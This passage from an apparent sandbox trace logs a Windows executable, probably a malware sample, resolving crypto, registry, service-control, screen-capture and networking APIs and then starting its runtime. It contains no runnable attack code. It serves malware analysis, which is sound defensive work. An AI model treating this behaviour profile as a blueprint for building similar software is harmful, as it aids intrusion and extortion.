(hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0162.867] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0162.868] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0162.869] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0162.869] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0162.870] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0162.871] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0162.871] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0162.871] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0162.874] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0162.874] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0162.874] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0162.875] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0162.875] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0162.875] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0162.875] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0162.875] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0162.876] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0162.876] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0162.876] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0162.876] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0162.876] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0162.877] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0162.877] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0162.883] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0162.883] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0162.885] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0162.885] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0162.885] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0162.885] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0162.891] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0162.891] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0162.891] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0162.892] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0162.892] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0162.892] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0162.893] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0162.893] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0162.893] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0162.893] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0162.902] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0162.902] atexit (param_1=0x1d30920) returned 0 [0162.923] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ea8c | out: lpSystemTimeAsFileTime=0x18ea8c*(dwLowDateTime=0x99c799c0, dwHighDateTime=0x1d60e72)) [0162.923] GetCurrentThreadId () returned 0x524 [0162.923] GetCurrentProcessId () returned 0xabc [0162.923] QueryPerformanceCounter (in: lpPerformanceCount=0x18ea84 | out: lpPerformanceCount=0x18ea84*=28299586660) returned 1 [0162.996] GetStartupInfoW (in: lpStartupInfo=0x18ea1c | out: lpStartupInfo=0x18ea1c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0163.013] GetProcessHeap () returned 0x260000 [0163.211] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0163.211] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0163.211] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0163.212] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0163.213] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0163.214] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0163.215] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0163.216] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3bc) returned 0x27f588 [0163.216] GetCurrentThreadId () returned 0x524 [0163.222] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x18) returned 0x26ebb0 [0163.222] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x27f950 [0163.222] GetStartupInfoW (in: lpStartupInfo=0x18e9ec | out: lpStartupInfo=0x18e9ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xed8f48c, hStdError=0x58)) [0163.223] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0163.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0163.223] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0163.223] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" --Admin IsNotAutoStart IsNotTask" [0163.223] GetEnvironmentStringsW () returned 0x280158* [0163.223] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xaca) returned 0x280c30 [0163.341] FreeEnvironmentStringsW (penv=0x280158) returned 1 [0163.348] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0163.349] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x281708 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x98) returned 0x281840 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x275898 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x6c) returned 0x2818e0 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x6e) returned 0x281958 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x78) returned 0x272df8 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x62) returned 0x2819d0 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b1d8 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276d98 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x28) returned 0x27abd0 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1a) returned 0x27f340 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4a) returned 0x281a40 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x72) returned 0x272e78 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b210 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b248 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1c) returned 0x27f368 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd2) returned 0x281a98 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x7c) returned 0x281b78 [0163.355] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x281c00 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3a) returned 0x2758e0 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x90) returned 0x281c40 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ac00 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b280 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x281cd8 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276de8 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x281d18 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x275928 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x82) returned 0x281d78 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b2b8 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f390 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2c) returned 0x27b2f0 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x281e08 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x281e68 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b328 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x275970 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x281ec8 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ac30 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b360 [0163.356] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8c) returned 0x281f28 [0163.356] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x280c30 | out: hHeap=0x260000) returned 1 [0163.461] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x280158 [0163.467] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x280960 [0163.504] GetLastError () returned 0x0 [0163.504] IsValidCodePage (CodePage=0x4e4) returned 1 [0163.504] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e9e0 | out: lpCPInfo=0x18e9e0) returned 1 [0163.510] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e4a8 | out: lpCPInfo=0x18e4a8) returned 1 [0163.517] GetLastError () returned 0x0 [0163.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0163.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18dfe8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0163.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e7bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1c÷Ø\x0eøé\x18", lpUsedDefaultChar=0x0) returned 256 [0163.524] GetLastError () returned 0x0 [0163.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0163.524] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e008, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0163.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e6bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 